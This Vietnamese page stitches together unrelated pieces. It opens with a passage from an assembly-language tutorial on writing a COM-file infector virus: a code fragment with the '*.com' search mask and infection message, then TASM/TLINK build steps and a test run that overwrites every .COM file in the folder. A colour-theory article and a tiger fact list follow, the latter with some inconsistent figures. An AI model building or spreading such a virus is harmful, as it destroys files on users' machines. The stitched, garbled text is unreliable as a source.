int 21

==================================================

comsig db "*.com",0

msgadd db 'Congratulations! You have infected all the COM files

in this',10,13

db 'Have a nice day.',10,13,'$'

Đây là data segment nói một cách nọm na là tương tự như bạn khai báo hằng (Const) ở pascal,C++ vậy.Và các hằng này sẽ được sử dụng trong code segment. Chúng ta sử dụng định nghĩa byte DB, để định nghĩa một chuỗi. Việc đặt 10,13 sau các chuỗi giúp cho việc hiển thị nó có thứ tự nếu không cả hai chuỗi sẽ hiển thị cùng lúc lên màn hinh $ tại phần cuối của dòng 2 báo hiệu kết thúc chuôi ==================================================

horny label near

nhãn horny chỉ có một mục đích là để xác điịnh offset trong việc xác định số byte ghi vào file cần làm nhiễm ==================================================

virus endp

code ends

end first_fly

kết thúc chương trình
==================================================

Biên dịch virus :

Bạn cần có TASM hay MASM. Trongbài này tôi hướng dẫn các bạn biên dịch virus bằng TASM. Các file cần có virus.asm TASM.EXE, TLINK

Đầu tiên lưu nó thành file ".asm" file,có thể sử dụng Notepad để soạn thảo mã rồi save as virus.asm. Sử dụng TASM gõ lệnh:

C:\>tasm virus.asm

Kết quả có thể là như sau:

Turbo Assembler Version 2.01

Assembling file: virus.asm

Error Messages: none

Warning Messages: none

Passes: 1

Remaining Memory: 418k (or something similar)

Nếu không có lỗi nào, nếu có lỗi nó sẽ báo cho bạn biết lỗi gì ở dòng nào .

Sau khi gõ lệnh TASM [asm] bạn sẽ được file *.obj

Để tạo COM file bạn gõ lệnh:

C:\>tlink /t virus.obj

Tlink sẽ tạo ra file virus.COM

Bây giờ hãy thử nghiệmvirus của bạn, mở Notepad lên, ghi gì tùy bạn , không ghi cũng được lưu thành file vidu.com. đặt nóvào thư muc của virus bạn vừa biên dịch. Rồi chạy virus bạn sẽ thấy kích thước của file vidu.com bây giờ sẽ bằng kích thước của virus(180 bytes). Tuy nhiên nhược virus này sẽ làm nhiễm tất cả các file .com trong thư mục chứa nó mà không cần biết file đó đã bị nhiễm hay chưa, ở phần sau tôi sẽ hướng dẫn các bạn cách để kiểm tra xem một file đã bị nhiễm hay chưa. Và cònmột điều nữa là virus này không có tác dụng với những file .com có size lớn hơn nó (đây chỉ là để minh họa nên tôi nghĩ như vậy là đủ)

Nghệ thuật phối màu

Nghệ thuật phối màu

Màu sắc luôn tác động đến cuộc sống của chúng ta.
Màu sắc là hiện tượng vật lý mà mắt chúng ta thấy được.
Màu sắc có ngôn ngữ riêng của nó mà chúng ta phải tự cảm nhận.
Màu sắc có sức mạnh làm tâm hồn chúng ta rung động.

Người ta có thể dùng nghệ thuật phối màu để nói lên ý tưởng của mình mà không cần đến lời nói hay câu văn.
Màu sắc ngoài cái đẹp trời cho còn có một chiều sâu kín đáo, chính cái điều kỳ diệu ấy làm rung động lòng người. Tất nhiên không phải lúc nào màu sắc cũng đẹp, không phải lúc nào màu sắc cũng hài hoà.

Vì vậy nghệ thuật phối màu sẽ bù đắp những khuyết điểm đó.

Phần I: Tóm tắt những khái niệm

1/ Màu dương tính:
Màu được tạo ra từ một nguồn sáng. Ví dụ: khi những màu cơ bản: Đỏ; Xanh lá cây và Xanh da trời phối hợp với nhau sẽ tạo ra màu trắng.

2/ Màu âm tính:
Là màu được xác định bởi sự hấp thu ánh sáng. Ví dụ: khi màu Xanh lục, Đỏ cánh sen và Vàng được phối hợp chúng sẽ tạo ra màu nâu đen.
Nếu bạn phối những màu dương tính cơ bản bạn sẽ được những màu âm tính cơ bản và ngược lại.
Hiểu được mối quan hệ đối nghịch này trong màu sắc rất cần thiết khi phải xác định và chỉnh sửa những trục trặc về màu sắc.

Ví dụ:
Nếu một hình ảnh quá xanh, bạn có 2 cách để tiếp cận vấn đề: Hoặc tăng thêm màu vàng vốn là màu đối nghịch với xanh da trời nhằm làm trung hoà màu xanh da trời. Hoặc giảm bớt màu xanh da trời trong hình ảnh. Cả 2 cách đều đi đến cùng một kết quả là giảm bớt được màu xanh.

3/ Vòng tròn màu căn bản (the color wheel)
Vòng tròn màu căn bản có 12 cung chia đều theo hình nan quạt trên diện tích hình tròn, mỗi cung có 8 cấp độ màu đi dần vào tâm vòng tròn từ đậm đến nhạt. 12 cung x 8 cấp độ sẽ tạo ra 106 màu căn bản và được đánh số từ 1 đến 106 đó cũng là kí hiệu khi ta chọn màu . Ví dụ: Số 1 là màu đỏ sậm nhất (C:0 – M:100 – Y:100 – K:45) số 36 là màu vàng tươi (C:0 – M:0 – Y:100 – K:0) số 84 (C:80 – M:100 – Y:0 – K:0) là màu tím rượu nếp than (híc nghe mà…thèm) số 68 (C:100 – M:60 – Y:0 – K:0) là màu xanh nước biển…

Vòng tròn màu căn bản được tạo ra từ 3 màu: Đỏ - Vàng - Lục lam. Từ ba màu này, màu sắc được pha lẫn hai màu với nhau ( ví dụ: Đỏ + Vàng = Da cam) rồi ba màu trộn lại với nhau, cứ thế ta sẽ có hơn 3.400 màu thông dụng nhất trong thiết kế đồ hoạ và nếu cứ pha , pha và pha trộn mãi bạn sẽ có hàng ty tỷ sắc màu cho…riêng bạn.

4/ Cách dùng màu:

• Cấp thứ nhất (Primary)
Dùng 3 màu: Đỏ - Vàng - Lục lam để phối ra các sắc độ màu khác nhau.

• Cấp thứ hai (Secondary)
Nếu lấy màu đỏ chồng lên màu vàng sẽ được màu da cam, lấy màu đỏ chồng lên lục lam sẽ có màu tím, lấy màu vàng chồng lên màu lục lam sẽ được màu xanh lá cây…
Cách lấy 2 màu chồng lên nhau để tạo ra màu khác như trên được gọi là màu chồng đơn.

• Cấp thứ ba (Tertiary)
Từ 3 màu căn bản: Đỏ - Vàng - Lục lam chúng ta đã phối ra màu da cam – xanh lá – tím. Nếu chồng các màu ở cấp Primary và Secondary, ta sẽ được các màu ở cấp Tertiary là: Đỏ cam – Vàng cam – Vàng xanh – Xanh lơ – Xanh tím và Đỏ tím.

5/ Cái này giờ mới biết:
Không có “cái gọi là” màu đen, màu xám hay màu trắng vì màu trắng chỉ là sắc độ giảm tối đa của một trong 12 màu trên vòng tròn màu, màu xám và đen chính là sắc độ tăng tối đa của những màu trên (quá xá là đúng)

6/ Trình tự phối màu:
• Bước 1:
Xác định rõ hiệu ứng màu sắc bạn muốn đạt được.(Hiệu ứng màu sẽ nói ở các phần sau của bài này)
• Bước 2:
Chọn 1 màu chính đặc trưng cho chủ đề muốn thể hiện.
• Bước 3:
Chọn 1 màu hỗ trợ cho màu chính. Để có thể tìm được màu hỗ trợ một cách nhanh chóng, bạn dùng 2 màu đối diện nhau trong vòng tròn màu căn bản.
Ví dụ:
Màu đỏ được chọn là màu chính thì màu hỗ trợ cho nó là màu xanh lá cây. Tương tự như vậy ta có các cặp màu chính và màu hỗ trợ như sau:
Màu Gạch cua – Xanh ve chai.
Da cam – Xanh dương.
Nghệ - Chàm.
Vàng – Tím.
Vàng xanh - Đỏ tím…
Màu chính và màu hỗ trợ có tính năng làm tăng nét rực rỡ, linh động và giúp nhau nổi bật lên.
Ví dụ:
Nếu ta đặt cánh hoa vàng trên phông nền tím, hoa vàng sẽ rực rỡ hơn nhờ màu tím làm nền đệm. Nhưng nếu cũng với cách thức ấy, dùng nền màu trắng hay xanh lá thì cánh hoa vàng không nổi bật được.
Nếu đặt mảng màu đỏ tươi cạnh màu xanh lá cây thì cũng có hiệu ứng tương tự.

• Bước 4:
Từ màu chính và màu phối hợp chọn ra màu thứ ba hài hoà với 2 màu trước.

Phần II: 07 SẮC CẦU VỒNG

Sắc độ hay tính chất của màu sắc gợi lên ít nhiều xúc động cho người xem. Người ta dùng nhiều từ khác nhau để mô tả đặc tính của màu sắc đơn và so sánh khi chúng phối hợp với nhau.

Tuy nhiên độ sáng và tối lại là điều cơ bản của việc tạo ra sắc độ. Nếu không có ánh sáng thì sẽ chẳng có màu sắc. Tất nhiên, ở trong bóng tối tất cả chỉ là màu đen. Ánh sáng mặt trời là chùm tia sáng có bước sóng khác nhau. Nếu ánh sáng mặt trời chiếu qua lăng kính thì sẽ tạo ra một dải màu. Trong thiên nhiên điều này được thể hiện qua cầu vồng 7 sắc.

Khi ánh sáng chiếu qua 1 vật, bề mặt của nó sẽ nhận bức xạ của bước sóng ánh sáng này và phản chiếu lại bức xạ của ánh sáng khác. Nếu mức hấp thụ bức xạ của các bước sóng đều nhau và mỗi thứ một chút thì chúng ta sẽ thấy vật ấy màu trắng. Ngược lại, nếu nó hấp thu toàn bộ bức xạ thì chúng ta sẽ thấy vật ấy màu đen.

Vậy màu sắc thấy được trên một sự vật là sự tổng hợp bức xạ ánh sáng mà bề mặt của nó phản chiếu.

Cùng một vật thể, nếu chụp hình ở dưới ánh sáng tự nhiên sẽ có sắc màu khác khi chụp dưới ánh sáng nhân tạo. Cũng vậy, khi soi một tờ in màu dưới ánh sáng tự nhiên thì màu sắc của hình ảnh sẽ khác khi soi tờ in dưới ánh sáng nhân tạo.

Màu sắc được phân thành 8 loại:
- Màu nóng (Hot)
- Màu lạnh (Cold)
- Màu ấm (Warm)
- Màu mát (Cool)
- Màu sáng (Light)
- Màu sậm (dark)
- Màu nhạt (Pale)
- Màu tươi (Bright)

Như đã nói ở phần đầu do không có hình minh hoạ giống như trong sách, nên các hình ảnh TNDH minh hoạ dưới đây có thể sẽ không phản ánh chính xác nội dung của từng màu. Một số màu chưa tìm được hình, mong các bạn xem nội dung và tìm kiếm giúp.

MÀU NÓNG
Màu nóng là màu đỏ bão hoà trên vòng tròn màu, đó là màu đỏ cờ được pha bởi màu magenta và yellow.
Màu nóng tự nó phản chiếu và lôi cuốn sự chú ý. Vì vậy màu đỏ thường dùng trong thiết kế khi muốn gây sự chú ý.
Màu nóng có ảnh hưởng mạnh mẽ, làm tác động đến không gian chung quanh nó.

MÀU LẠNH
Màu lạnh là mầu thuần xanh biển. Nó toả sáng và tươi sáng hẳn lên.
Màu lạnh làm chúng ta thấy mát như đang gần một tảng đá hay trên tuyết.
Màu lạnh làm người xem có cảm giác mát mẻ, nhẹ nhàng.
Màu lạnh có tính đối lập với màu nóng.
Khi chuyển dần từ màu nóng sang màu lạnh, chúng ta có cảm giác như đang đứng bên lò lửa được chuyển sang cạnh một tảng băng, thật dễ chịu (?!)

MÀU ẤM
Trong màu ấm luôn có sự hiện diện của màu đỏ.
Màu ấm được tạo ra do sự phối hợp giữa màu đỏ và màu vàng.
Tùy theo mức độ pha giữa màu đỏ và màu vàng mà chúng ta có những dạng màu ấm khác nhau.
Ví dụ: màu đỏ cam; màu cam; màu vàng cam …
Màu ấm như thân thiện, đón chào người xem.
Nhìn màu ấm giống như chúng ta đang ngắm cảnh đẹp của mặt trời bình minh hoặc hoàng hôn.

MÀU MÁT
Màu mát được tạo ra trên nền màu xanh.
Nó không giống như màu lạnh bởi vì được phối với màu vàng.
Một số dạng màu mát như : vàng xanh; xanh lá cây; lục lam…
Dạng màu xanh ngọc và xanh lá cây luôn có trong tự nhiên.
Màu mát làm chúng ta thấy nhẹ nhàng như đang trong mùa đâm chồi nẩy lộc của mùa xuân.
Màu mát luôn nhẹ nhàng, tươi mát và sâu lắng.
Màu mát giống như một thác nước làm dịu mắt người xem.

MÀU SÁNG
Màu sáng là màu của thủy tinh, của cây tùng lam.
Màu sáng có tính nhẹ nhàng trong sáng.
Màu sáng được tạo ra từ màu đỏ pha với lục lam đi kèm với vàng nhạt.
Tuy nhiên sắc thái màu phải trong. Khi độ trong của màu tăng thì mức độ thay đổi sắc độ màu giảm.
Màu sáng làm chúng ta thấy tâm hồn trở nên thoải mái, thư thái và buông lỏng.
Màu sáng giống như màn cửa sổ hé ra để ánh nắng ban mai lùa vào phòng.

MÀU SẬM
Màu sậm là màu chứa màu đen trong khi phối màu.
Màu sậm làm khoảng không gian như thu nhỏ lại và làm vật thể như nhỏ hơn.
Màu sậm làm tăng tính nghiêm trang, đứng đắn.
Thật vậy màu sậm ẩn khuất như khung cảnh của mùa thu và mùa đông ảm đạm.
Phối hợp giữa màu sáng và màu sậm sẽ gây nên một ấn tượng sâu sắc, mạnh mẽ. Nó tiêu biểu cho sự đối lập của tự nhiên, sự tương phản nhưng cần thiết giữa ngày và đêm.

MÀU NHẠT
Màu nhạt là màu tùng lam thật nhẹ.
Sắc màu nhợt nhạt, nó chứa ít nhất 65% màu trắng.
Màu nhạt tạo nên vẻ mềm mại, lãng mạn và lơ đãng.
Màu nhạt thường dùng như màu ngà, tùng lam sáng và hồng tối nhạt.
Màu nhạt tạo cho người xem một cảm giác như ngắm đám mây nhẹ trôi hoặc như nắng nhẹ ban mai hoặc êm đềm như một sáng mờ sương.
Vì màu nhạt là màu trang nhã nên thường được dùng trong trang trí nội thất.

MÀU TƯƠI
Màu tươi là tổng hợp tinh khiết của màu sắc.
Sự tươi thắm của màu sắc được tạo ra bằng cách bỏ qua thang xám và đen.
Trong màu tươi chứa các sắc màu xanh; đỏ; vàng và cam.
Màu tươi chói lọi và sặc sỡ, nó gây nên sự chú ý.
Một chiếc xe màu vàng tươi, một chùm bong bóng rực rỡ hoặc cái mũi tươi thắm của chú hề … là những sắc màu không bao giờ bị quên lãng.
Màu sắc tươi tạo ra nét phấn khởi, vui tươi luôn được ngành thời trang và quảng cáo chú ý.

Năm con Hổ, nói chuyện về Hổ

1. Hổ là loài mèo lớn nhất trên Trái đất.

2. Thế giới có 8 phân loài hổ. Đó là hổ Java, hổ Bali, hổ Đông Dương, hổ Caspi, hổ Sumatra, hổ Bengal, hổ Soberia, hổ Hoa Nam. Hổ Hoa Nam được coi là tổ tiên của loài hổ. Châu Phi không hề có hổ.

3. Thế nhưng ba phân loài đã tuyệt chủng. Hổ Bali không còn có trong thiên nhiên từ những năm 1940, hổ Caspi những năm 1970 và hổ Java những năm 1970.

4. Hiện nay, nguy cơ tuyệt chủng của hổ thuộc loại cao nhất trong muôn loài. Hổ Hoa Nam chỉ còn khoảng 60 con trong các vườn thú và khoảng 20 con trong thiên nhiên (và đã hai thập kỷ qua, chưa ai trông thấy con nào).

5. Một con hổ nuôi có thể sống đến 20 năm, trong khi sống trong tự do chỉ thọ từ 19 đến 15 năm.

6. Do tuyết lạnh, hổ Siberia lông rất dày và to lớn nhất. Chúng dài trung bình 2,75m và nặng chừng 245kg. Tiếp đó là hổ Bengal, dài 2,7m và nặng 218kg. Hổ Sumatra nhỏ nhất, chỉ dài 2,4m và nặng 113kg.

7. Nặng kỷ lục là một bác hổ Siberia, những 465kg.

8. Về dân số thì hổ Bengal đông nhất, khoảng 3.000 con. Và ít nhất là hổ Hoa Nam, như đã nói.

9. Nước bọt hổ là chất sát trùng rất mạnh, được chúng dùng làm sạch và chữa vết thương.

10. Hổ sống đơn độc, theo kiểu “giang sơn nào anh hùng ấy” trên một lãnh địa riêng. Trung bình một con hổ cần 160km² để sống. Chúng đánh dấu lãnh thổ của mình bằng cách tưới lên gốc cây nước tiểu rất khai hoặc cào mạnh lên thân cây.

11. Mùi nước tiểu đánh dấu lãnh thổ là một “mật mã” mà chỉ những con hổ khác mới hiểu được. Nó thông báo “không cho phép vượt qua” hoặc “cho phép” khi muốn tìm vợ (hoặc chồng) trong mùa giao phối. Lãnh địa của hổ đực bao trùm lên lãnh địa của nhiều hổ cái. “Giấy phép” chỉ cấp trong một số ngày.

12. Hoa văn vằn vện trên thân mỗi con hổ một khác, như dấu vân tay của người vậy. Nếu cạo lông hổ đi thì khi mọc lại, bộ trang phục vẫn y như cũ.

13. Trong các giác quan, tai hổ thính nhất. Mắt hổ vào ban đêm tinh hơn mắt người đến 6 lần. Nanh hổ dài 8-9cm, hàm hổ khỏe, có thể ngoạm sâu và làm gãy xương sống bất cứ con mồi nào. Vuốt hổ sắc, gân chân hổ rất dai và bền (để giữ mồi và làm nó vẫn đứng vững khi đã bị bắn chết). Duôi hổ dài bằng nửa thân, giữ thăng bằng khi nó lao vào con mồi (cũng như để thông tin cho đồng loại).

14. Hổ săn mồi chẳng khéo lắm đâu. 20 lần đuổi theo con mồi, may ra mới 1 lần thu được chiến lợi phẩm. Chúng khoái nhất là thịt lợn, hươu nai, trâu bò, sau mới đến thỏ và cá. Để no nê, một bữa phải 27,2kg thịt. Ăn thừa, hổ giấu hoặc chôn vùi nơi nào đó để dành cho bữa sau. Nhưng cũng có thể nhịn cả tuần liền. Chỉ hổ Ấn Độ là thích ăn thịt người. Mỗi năm ở đây có chừng 50 người bị hổ ăn thịt.

15. Hổ thường ngủ 18 tiếng mỗi ngày. Hổ thích bơi và đằm mình trong nước.

16. Ba tuổi hổ bắt đầu trưởng thành. Một gã hổ đực có thể “làm tình” 6 lần trong một giờ. Có lẽ đó là lý do để Đông y coi sản phẩm từ hổ là thuốc bổ dương chăng?

17. Hổ cái mang thai 102-106 ngày và thường sinh 2, 3 con, nhưng tỷ lệ tử vong rất cao. Tỷ lệ đực/cái là 1/1, hổ con mới đẻ chưa mở mắt và lớn rất nhanh, tăng khoảng 100 g/ngày. 12-13 tuần bắt đầu biết rượt đuổi và vật lộn nhau để học cách săn mồi. nhưng vẫn bám đuôi mẹ khi đã 2, 3 tuổi, để được mẹ bảo vệ, nếu không có thể bị các hổ đực khác ăn thịt.

18. Hổ trắng không phải là hổ bạch tạng, mà là một dòng riêng thuộc hổ Bengal.

18. Hổ đi vào thần thoại nhiều nước châu Á. Người ta thờ hổ, gọi hổ là “ông”.

19. Trong Đông y, các bộ phận của hổ được dùng làm ra các thứ thuốc quý dựa trên nhưng lời đồn đại đã trên 1.000 năm nay, nhưng chẳng có dẫn chứng khoa học nào chứng minh cho những điều đó.

20. Ngoài ra, hổ còn phục vụ cho các thú chơi kỳ quái. Nhà giàu thích bày biện bộ da hổ, hổ nhồi bông trong nhà. Nanh hổ, vuốt hổ để đeo làm đồ trang sức hoặc trừ tà.

21.Xưa nay hổ đều bị tiêu diệt một cách tàn nhẫn. Từ đầu thế kỷ XX đến nay, ít nhất 100.000 con hổ đã bị bắn hạ.

22. Từ năm 1959, hầu như ở những nước có hổ sinh sống đều có đạo luật bảo vệ hổ, phạt nặng việc buôn bán hổ để thỏa mãn đòi hỏi của “thị trường hổ”. Từ năm 1960 đến 1984, tại Hoa Nam, người ta đã tịch thu 3.000 bộ da hổ. Hổ Bengal trung bình mỗi ngày bị giết một con.

23. Thế nhưng nạn săn bắt trộm vẫn diễn ra. Những nước tiêu thụ các bộ phận cơ thể hổ chủ yếu là Trung Quốc (và Đài Loan), Hàn Quốc, Nhật Bản. Còn thuốc và sản phẩm Đông y từ hổ có thể mua tại khắp nơi trên thế giới kể cả Anh, Mỹ, Tây Âu, Australia…

24. Một nhà máy rượu ở Đài Loan mỗi năm nhập 2.000kg xương hổ, tương đương 100 đến 200 con hổ bị giết hại và sản xuất ra 100.000 sản phẩm rượu ngâm cao hổ cốt. Có lẽ để bảo vệ hổ phải xóa bỏ cả “thị trường tiêu thụ hổ và các bộ phận từ hổ”.

25. Hổ trong các sở thú trên thế giới hiện nhiều hơn hổ trong thiên nhiên hoang dã. Riêng tại nước Mỹ, số hổ nuôi nhiều gấp đôi số hổ sống tự do trong rừng hiện nay. Ngoài số hổ nuôi công khai, nhiều nước châu Á còn nuôi hổ bất hợp pháp vì mục đích thương mại.

Theo Vietnamnet.vn